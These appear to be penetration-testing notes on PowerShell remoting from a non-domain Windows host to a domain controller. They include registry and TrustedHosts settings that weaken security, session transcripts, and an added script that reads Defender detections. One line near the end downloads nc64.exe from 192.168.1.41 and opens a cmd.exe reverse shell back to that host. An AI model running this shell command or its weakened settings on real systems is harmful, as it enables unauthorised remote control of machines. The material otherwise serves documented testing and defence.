
Powershell Remoting from a Non-Domain joined Host


  1. From an admin shell on the machine you wish to access, allow remote use of local administrator tokens and enable PS remoting. The LocalAccountTokenFilterPolicy value disables the UAC remote restriction, which otherwise strips the admin token from local (non-domain) accounts connecting over the network; domain accounts do not need it:
New-ItemProperty -Name LocalAccountTokenFilterPolicy `
  -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System `
  -PropertyType DWord -Value 1

Enable-PSRemoting -Force
  2. From an admin shell on your client system, allow WinRM connections to non-domain machines. TrustedHosts decides which hosts the client is willing to send NTLM credentials to, so "*" trusts every host; for a single engagement put the target's name or IP here instead:
Set-Item WSMan:\localhost\Client\TrustedHosts -Value "*" -Force
  3. Connect to the remote machine using the exact login credentials. For example, a local user would provide SERVER\username and password. The ConsolePrompting setting makes Get-Credential ask in the console instead of popping a GUI dialog:
$SERVER = 'REMOTE_SERVER'
$USER   = 'REMOTE_USER'
Set-ItemProperty 'HKLM:\SOFTWARE\Microsoft\PowerShell\1\ShellIds' ConsolePrompting $true
Invoke-Command -ComputerName $SERVER -Credential (Get-Credential "$SERVER\$USER") { ls C:\ }
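The three steps above as one client-side script, added here as an example and not part of the original notes. It scopes TrustedHosts to the single target instead of "*", checks that the WinRM listener answers before asking for a password, and reuses one session for several commands. The server and user names are taken from the transcript below ('DC1.puckcorp.local', 'bolke'); everything else about the environment is assumed.

```powershell
#Requires -RunAsAdministrator
# Added example (not from the original notes): PS remoting from a non-domain
# client with TrustedHosts limited to one host.
# Assumed names: target 'DC1.puckcorp.local', account 'bolke'.
$Server = 'DC1.puckcorp.local'
$User   = 'bolke'

# Target-side preparation (run in an admin shell ON the target, once).
# Re-running New-ItemProperty on an existing value fails; -Force overwrites it.
# New-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' `
#   -Name LocalAccountTokenFilterPolicy -PropertyType DWord -Value 1 -Force
# Enable-PSRemoting -Force

# Client side: append the target to TrustedHosts instead of replacing the
# list with "*". TrustedHosts is the set of hosts this client will send
# NTLM/Basic credentials to, so a wildcard lets a spoofed host collect them.
$original = (Get-Item WSMan:\localhost\Client\TrustedHosts).Value
if ($original -notmatch [regex]::Escape($Server)) {
    $newValue = if ([string]::IsNullOrEmpty($original)) { $Server } else { "$original,$Server" }
    Set-Item WSMan:\localhost\Client\TrustedHosts -Value $newValue -Force
}
"TrustedHosts is now: " + (Get-Item WSMan:\localhost\Client\TrustedHosts).Value

# Ask for the password in the console rather than a GUI dialog.
Set-ItemProperty 'HKLM:\SOFTWARE\Microsoft\PowerShell\1\ShellIds' ConsolePrompting $true

# Fail early if the listener is not reachable (unauthenticated identify request).
Test-WSMan -ComputerName $Server -ErrorAction Stop | Out-Null

# One session, several commands. Negotiate is also the default; from a
# non-domain client it falls back to NTLM because Kerberos is not available.
$cred    = Get-Credential "$Server\$User"
$session = New-PSSession -ComputerName $Server -Credential $cred -Authentication Negotiate
try {
    Invoke-Command -Session $session -ScriptBlock { whoami; hostname }
    Invoke-Command -Session $session -ScriptBlock { Get-ChildItem C:\ }
    # For an interactive prompt on the same session:
    # Enter-PSSession -Session $session
}
finally {
    Remove-PSSession $session
    # Cleanup after the engagement: restore the TrustedHosts list you started with.
    # Set-Item WSMan:\localhost\Client\TrustedHosts -Value $original -Force
}
```

For a domain account the credential can also be given as DOMAIN\user (here puckcorp\bolke); the transcript below shows that SERVER\user works as well because the DC resolves it.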


Examples:

PS C:\iso> whoami
puckie\puck
PS C:\iso> hostname
puckie
PS C:\iso> $SERVER = 'DC1.puckcorp.local'
PS C:\iso> $USER   = 'bolke'
PS C:\iso> Set-ItemProperty 'HKLM:\SOFTWARE\Microsoft\PowerShell\1\ShellIds' ConsolePrompting $true
PS C:\iso> Enter-PSSession -Computer $SERVER -Credential (get-credential "$SERVER\$USER")

Windows PowerShell credential request
Enter your credentials.
Password for user DC1.puckcorp.local\bolke: *********

[DC1.puckcorp.local]: PS C:\Users\bolke\Documents> whoami
puckcorp\bolke
[DC1.puckcorp.local]: PS C:\Users\bolke\Documents> hostname
DC1
[DC1.puckcorp.local]: PS C:\Users\bolke\Documents>


PS C:\PENTEST> Invoke-Command -Computer $SERVER -Credential (get-credential "$SERVER\$USER") { whoami }

Windows PowerShell credential request
Enter your credentials.
Password for user dc1.puckcorp.local\Administrator: **********

puckcorp\administrator
PS C:\PENTEST>

or, for an interactive prompt on the remote machine, use Enter-PSSession -Computer $SERVER -Credential (get-credential "$SERVER\$USER"):

PS C:\PENTEST> Enter-PSSession -Computer $SERVER -Credential (get-credential "$SERVER\$USER")

Windows PowerShell credential request
Enter your credentials.
Password for user dc1.puckcorp.local\Administrator: **********

[dc1.puckcorp.local]: PS C:\Users\Administrator\Documents> whoami
puckcorp\administrator
[dc1.puckcorp.local]: PS C:\Users\Administrator\Documents> hostname
DC1
[dc1.puckcorp.local]: PS C:\Users\Administrator\Documents>


Netcat reverse shell

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.41:8000/nc64.exe','nc64.exe')"; Start-Process nc64.exe -NoNewWindow -Argumentlist '192.168.1.41 9001 -e cmd.exe'

-> Microsoft 365 Defender detected this. Incident name: "Suspicious 'PossibleRemoteCmdShell' behavior was blocked" (the shell was killed after about 30 seconds).
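To see what the endpoint itself logged for that block (the incident above is the cloud-side view in the Microsoft 365 Defender portal), the following added example, not part of the original notes, reads the local Defender operational log and the Defender module. It assumes the behavior block was also recorded locally as the standard 1116 (detected) / 1117 (action taken) events; the 30-minute window is an arbitrary choice.

```powershell
# Added example (not from the original notes): list recent local Defender
# detections, e.g. after a reverse-shell attempt was blocked.
# Assumption: the block is logged as event 1116/1117 in the standard
# Defender operational log, which holds for AV/behavior-monitoring hits.
function Get-DefenderDetections {
    param([int]$Minutes = 30)   # assumed window, adjust as needed
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 1116, 1117   # 1116 = threat detected, 1117 = action taken
        StartTime = (Get-Date).AddMinutes(-$Minutes)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            # The event message carries "Name:" and "Path:" lines; pull those out.
            $lines = $_.Message -split "`n"
            [pscustomobject]@{
                Time   = $_.TimeCreated
                Id     = $_.Id
                Threat = ($lines | Where-Object { $_ -match '^\s*Name:' }) -join ''
                Path   = ($lines | Where-Object { $_ -match '^\s*Path:' }) -join ''
            }
        }
}

Get-DefenderDetections | Format-Table -AutoSize

# Same data through the Defender module (requires the module, present on
# Windows 10/11 and Server with Defender installed).
Get-MpThreatDetection |
    Sort-Object InitialDetectionTime -Descending |
    Select-Object -First 5 InitialDetectionTime, ThreatID, Resources
```

If nothing shows up locally while the portal still reports the incident, the block came from the cloud-delivered behavior engine rather than a local signature hit, which is why the shell ran for a while before it was killed.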